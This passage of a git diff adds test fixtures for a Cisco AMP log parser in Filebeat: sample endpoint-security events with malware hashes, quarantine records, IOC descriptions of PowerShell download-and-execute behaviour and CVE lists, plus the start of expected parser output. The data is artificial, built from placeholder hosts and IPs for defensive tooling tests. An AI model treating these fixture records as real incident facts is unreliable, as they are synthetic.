Detected","event_type_id":1107296279,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Low","start_timestamp":1610534253,"start_date":"2021-01-13T10:37:33+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"38:1e:eb:ba:2c:15"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Clean","file_name":"WINWORD.EXE","identity":{"sha256":"3d46e95284f93bbb76b3b7e1bf0e1b2d51e8a9411c2b6e649112f22f92de63c2"},"parent":{"disposition":"Clean","identity":{"sha256":"d5bc504277172be5c54b60ad5c13209dc1f729131def084de3ec8c72e54c58ef"}}},"vulnerabilities":[{"name":"Microsoft Office","version":"2013","cve":"CVE-2014-0260","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-0260"},{"cve":"CVE-2014-1761","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-1761"},{"cve":"CVE-2014-6357","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-6357"},{"cve":"CVE-2015-0085","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-0085"},{"cve":"CVE-2015-0086","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-0086"},{"cve":"CVE-2015-1641","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-1641"},{"cve":"CVE-2015-1650","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-1650"},{"cve":"CVE-2015-1682","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-1682"},{"cve":"CVE-2015-2379","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-2379"},{"cve":"CVE-2015-2380","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vuln
Id=CVE-2015-2380"},{"cve":"CVE-2015-2424","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-2424"},{"cve":"CVE-2016-0127","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-0127"},{"cve":"CVE-2016-7193","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-7193"},{"cve":"CVE-2017-0292","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-0292"},{"cve":"CVE-2017-11826","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11826"}]}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6508159571352093000,"timestamp":1610533415,"timestamp_nanoseconds":349000000,"date":"2021-01-13T10:23:35+00:00","event_type":"Policy Update","event_type_id":553648130,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"38:1e:eb:ba:2c:15"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1515298360312529000,"timestamp":1610532793,"timestamp_nanoseconds":312509000,"date":"2021-01-13T10:13:13+00:00","event_type":"Cloud 
IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","start_timestamp":1610532793,"start_date":"2021-01-13T10:13:13+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"38:1e:eb:ba:2c:15"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"PowerShell is a Windows utility that allows access to many Microsoft APIs within a shell environment. In this case, a script attempted to download a file or script to the local system and then execute it. Malware authors may use this to download items, rename them, execute and delete them with a single command.","short_description":"W32.PowershellDownloadedExecutable.ioc"},"file":{"disposition":"Clean","file_name":"PowerShell.exe","file_path":"/C:/Windows/SysWOW64/WindowsPowerShell/v1.0/PowerShell.exe","identity":{"sha256":"6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7"},"parent":{"disposition":"Clean","identity":{"sha256":"3d46e95284f93bbb76b3b7e1bf0e1b2d51e8a9411c2b6e649112f22f92de63c2"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1515298355162029000,"timestamp":1610532788,"timestamp_nanoseconds":162019000,"date":"2021-01-13T10:13:08+00:00","event_type":"Cloud 
IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","start_timestamp":1610532788,"start_date":"2021-01-13T10:13:08+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"38:1e:eb:ba:2c:15"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"Microsoft Word launched PowerShell. This is indicative of multiple dropper variants that make use of Visual Basic Application macros to perform nefarious activities, such as downloading and executing malicious executables.","short_description":"W32.WinWord.Powershell"},"file":{"disposition":"Clean","file_name":"PowerShell.exe","file_path":"/C:/Windows/SysWOW64/WindowsPowerShell/v1.0/PowerShell.exe","identity":{"sha256":"6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7"},"parent":{"disposition":"Clean","identity":{"sha256":"3d46e95284f93bbb76b3b7e1bf0e1b2d51e8a9411c2b6e649112f22f92de63c2"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6508153524038140000,"timestamp":1610532007,"timestamp_nanoseconds":606000000,"date":"2021-01-13T10:00:07+00:00","event_type":"Threat 
Quarantined","event_type_id":553648143,"detection_id":"6508153524038139905","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"38:1e:eb:ba:2c:15"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"4a45dbc60436fc72fbd8a8bf81995c378575142e0022015f29a4b25546e19cef"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1521062325693667300,"timestamp":1610447087,"timestamp_nanoseconds":693632000,"date":"2021-01-12T10:24:47+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","start_timestamp":1610447087,"start_date":"2021-01-12T10:24:47+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Exploit_Prevention_Audit","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"d2:78:15:4a:f4:a2"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"PowerShell is a Windows utility that allows access to many Microsoft APIs within a shell environment. In this case, a script attempted to download a file or script to the local system and then execute it. 
Malware authors may use this to download items, rename them, execute and delete them with a single command.","short_description":"W32.PowershellDownloadedExecutable.ioc"},"file":{"disposition":"Clean","file_name":"powershell.exe","file_path":"/C:/Windows/System32/WindowsPowerShell/v1.0/powershell.exe","identity":{"sha256":"6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7"},"parent":{"disposition":"Clean","identity":{"sha256":"17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6532910514396201000,"timestamp":1610446522,"timestamp_nanoseconds":872000000,"date":"2021-01-12T10:15:22+00:00","event_type":"Policy Update","event_type_id":553648130,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Exploit_Prevention_Audit","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"d2:78:15:4a:f4:a2"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6525520937264087000,"timestamp":1608875349,"timestamp_nanoseconds":661000000,"date":"2020-12-25T05:49:09+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.GenericKD:Malwaregen.21do.1201","detection_id":"6525520937264087041","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Intel","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e6:44:a0:56:f3:9a"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"OLD.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\Desktop\\OLD.exe","identity":{"sha256":"edb1ff2521fb4bf748111f92786d260d40407a2e8463dcd24bb09f908ee13eb9","sha1":"26de43cc558a4e0e60eddd4dc9321bcb5a0a181c","md5":"cfdd16225e67471f5ef54cab9b3a5558"},"parent":{"process_id":2632,"disposition":"Clean","file_name":"explorer.exe","identity":{"sha256":"d5bc504277172be5c54b60ad5c13209dc1f729131def084de3ec8c72e54c58ef","sha1":"84123a3decdaa217e3588a1de59fe6cee1998004","md5":"38ae1b3c38faef56fe4907922f0385ba"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6525520937264087000,"timestamp":1608875349,"timestamp_nanoseconds":661000000,"date":"2020-12-25T05:49:09+00:00","event_type":"Threat 
Quarantined","event_type_id":553648143,"detection_id":"6525520937264087041","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Intel","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e6:44:a0:56:f3:9a"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"edb1ff2521fb4bf748111f92786d260d40407a2e8463dcd24bb09f908ee13eb9"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6525516191325225000,"timestamp":1608874244,"timestamp_nanoseconds":500000000,"date":"2020-12-25T05:30:44+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"Auto.F2863A.211556.in02","detection_id":"6525516191325224961","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Intel","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e6:44:a0:56:f3:9a"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"twhy.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Roaming\\twhy.exe","identity":{"sha256":"f2863a775c7faa85aefa3814530d9356ff700ae8bf534584652c2b4b720ee117","sha1":"7d9518ea3f98d037745352b23861fab05d3777dc","md5":"c624d61b8f076c3ef05f74eeb96c8954"},"parent":{"process_id":4868,"disposition":"Clean","file_name":"powershell.exe","identity":{"sha256":"6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7","sha1":"04c5d2b4da9a0f3fa8a45702d4256cee42d8c48d","md5":"92f44e405db16ac55d97e3bfe3b132fa"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6525516191325225000,"timestamp":1608874244,"timestamp_nanoseconds":500000000,"date":"2020-12-25T05:30:44+00:00","event_type":"Threat 
Quarantined","event_type_id":553648143,"detection_id":"6525516191325224961","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Intel","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e6:44:a0:56:f3:9a"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"f2863a775c7faa85aefa3814530d9356ff700ae8bf534584652c2b4b720ee117"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1519340132516139000,"timestamp":1608874241,"timestamp_nanoseconds":516130000,"date":"2020-12-25T05:30:41+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","start_timestamp":1608874241,"start_date":"2020-12-25T05:30:41+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Intel","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e6:44:a0:56:f3:9a"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"PowerShell is a Windows utility that allows access to many Microsoft APIs within a shell environment. In this case, a script attempted to download a file or script to the local system and then execute it. 
Malware authors may use this to download items, rename them, execute and delete them with a single command.","short_description":"W32.PowershellDownloadedExecutable.ioc"},"file":{"disposition":"Clean","file_name":"powershell.exe","file_path":"/C:/Windows/SysWOW64/WindowsPowerShell/v1.0/powershell.exe","identity":{"sha256":"6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7"},"parent":{"disposition":"Clean","identity":{"sha256":"664e83900e42179cfea99edb71abaf00b35e558da8d5f2e35004b2a623d5b5f7"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1519340132474871000,"timestamp":1608874241,"timestamp_nanoseconds":474861000,"date":"2020-12-25T05:30:41+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","start_timestamp":1608874241,"start_date":"2020-12-25T05:30:41+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Intel","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e6:44:a0:56:f3:9a"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"Microsoft Word launched PowerShell. 
This is indicative of multiple dropper variants that make use of Visual Basic Application macros to perform nefarious activities, such as downloading and executing malicious executables.","short_description":"W32.WinWord.Powershell"},"file":{"disposition":"Clean","file_name":"powershell.exe","file_path":"/C:/Windows/SysWOW64/WindowsPowerShell/v1.0/powershell.exe","identity":{"sha256":"6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7"},"parent":{"disposition":"Clean","identity":{"sha256":"664e83900e42179cfea99edb71abaf00b35e558da8d5f2e35004b2a623d5b5f7"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":15193384389977,"timestamp":1608872547,"timestamp_nanoseconds":0,"date":"2020-12-25T05:02:27+00:00","event_type":"Vulnerable Application Detected","event_type_id":1107296279,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Low","start_timestamp":1608872547,"start_date":"2020-12-25T05:02:27+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Intel","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e6:44:a0:56:f3:9a"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Clean","file_name":"mshtml.dll","identity":{"sha256":"d1bea74ac9d85b3dcd4abc1af42af6c37b9349defc8e6577993611b773f56ca0"},"parent":{"disposition":"Clean","identity":{"sha256":"93b2ed4004ed5f7f3039dd7ecbd22c7e4e24b6373b4d9ef8d6e45a179b13a5e8"}}},"vulnerabilities":[{"name":"Microsoft Internet 
Explorer","version":"11","cve":"CVE-2018-0762","score":"7.6","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-0762"},{"cve":"CVE-2018-0772","score":"7.6","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-0772"}]}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":15193384371995,"timestamp":1608872546,"timestamp_nanoseconds":0,"date":"2020-12-25T05:02:26+00:00","event_type":"Vulnerable Application Detected","event_type_id":1107296279,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Low","start_timestamp":1608872546,"start_date":"2020-12-25T05:02:26+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Intel","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e6:44:a0:56:f3:9a"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Clean","file_name":"mshtml.dll","identity":{"sha256":"1dc5d15a26a79bb46519952a60b15aa4acb36f6ce3247ebf50df9c157bc4fcf4"},"parent":{"disposition":"Clean","identity":{"sha256":"93b2ed4004ed5f7f3039dd7ecbd22c7e4e24b6373b4d9ef8d6e45a179b13a5e8"}}},"vulnerabilities":[{"name":"Microsoft Internet Explorer","version":"11","cve":"CVE-2018-0762","score":"7.6","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-0762"},{"cve":"CVE-2018-0772","score":"7.6","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-0772"}]}} 
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":15193366641599,"timestamp":1608870773,"timestamp_nanoseconds":0,"date":"2020-12-25T04:32:53+00:00","event_type":"Vulnerable Application Detected","event_type_id":1107296279,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Low","start_timestamp":1608870773,"start_date":"2020-12-25T04:32:53+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Intel","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e6:44:a0:56:f3:9a"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Clean","file_name":"OUTLOOK.EXE","identity":{"sha256":"465f398ae8e3c32395eb7c04bc8cd24595068e6a127e243bed3e9b4931556bfc"},"parent":{"disposition":"Clean","identity":{"sha256":"71854d2c40664493e05c0a7e4f0c7cc74ada1a63eec1d4fe32350f6af8728243"}}},"vulnerabilities":[{"name":"Microsoft 
Office","version":"2016","cve":"CVE-2017-0106","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-0106"},{"cve":"CVE-2017-11774","score":"6.8","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11774"},{"cve":"CVE-2017-8506","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-8506"},{"cve":"CVE-2017-8507","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-8507"},{"cve":"CVE-2017-8571","score":"6.8","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-8571"},{"cve":"CVE-2017-8663","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-8663"},{"cve":"CVE-2018-0791","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-0791"}]}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6525498672153625000,"timestamp":1608870165,"timestamp_nanoseconds":878000000,"date":"2020-12-25T04:22:45+00:00","event_type":"Policy Update","event_type_id":553648130,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Intel","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e6:44:a0:56:f3:9a"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}}}} 
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6525494703603843000,"timestamp":1608869241,"timestamp_nanoseconds":928000000,"date":"2020-12-25T04:07:21+00:00","event_type":"Scan Completed, No Detections","event_type_id":554696715,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Intel","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e6:44:a0:56:f3:9a"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"scan":{"description":"Flash Scan","clean":true,"scanned_files":2872,"scanned_processes":49,"scanned_paths":0,"malicious_detections":0}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6525494527510184000,"timestamp":1608869200,"timestamp_nanoseconds":537000000,"date":"2020-12-25T04:06:40+00:00","event_type":"Scan 
Started","event_type_id":554696714,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Intel","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e6:44:a0:56:f3:9a"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"scan":{"description":"Flash Scan"}}}
diff --git a/x-pack/filebeat/module/cisco/amp/test/cisco_amp1.ndjson.log-expected.json b/x-pack/filebeat/module/cisco/amp/test/cisco_amp1.ndjson.log-expected.json
new file mode 100644
index 00000000000..6f6bb95e97a
--- /dev/null
+++ b/x-pack/filebeat/module/cisco/amp/test/cisco_amp1.ndjson.log-expected.json
@@ -0,0 +1,2759 @@ +[ + { + "@timestamp": "2021-01-14T10:33:46.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "f9:65:da:22:2a:41" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.12081E6CA3-95.SBX.TG", + "cisco.amp.detection_id": "6411425813945647105", + "cisco.amp.event_type_id": 553648147, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "f9:65:da:22:2a:41" + ], + "cisco.amp.timestamp_nanoseconds": 742000000, + "event.action": "Retrospective Detection", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6411425813945647000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "file.hash.md5": "c877b67a5733c59d0d8ed8d519df0c91", + "file.hash.sha1": "128aa78059540cf0cdae2a3cea30cd80e00f2046", + "file.hash.sha256": "12081e6ca366ad7d08368fbc7d4107605a9b75d27c671e7e0a58588f94be5837", + "file.name": "MspthrdHash.exe", + "file.path": "\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\MspthrdHash\\MspthrdHash.exe", + "fileset.name": "amp", + "host.hostname": "Demo_Qakbot_1", + "host.name": "Demo_Qakbot_1", + "host.os.family": "windows", + "host.os.platform": "windows", + "input.type": "log", + "log.offset": 0, + "related.hash": [ + "12081e6ca366ad7d08368fbc7d4107605a9b75d27c671e7e0a58588f94be5837", + "c877b67a5733c59d0d8ed8d519df0c91", + "128aa78059540cf0cdae2a3cea30cd80e00f2046" + ], + "related.hosts": [ + 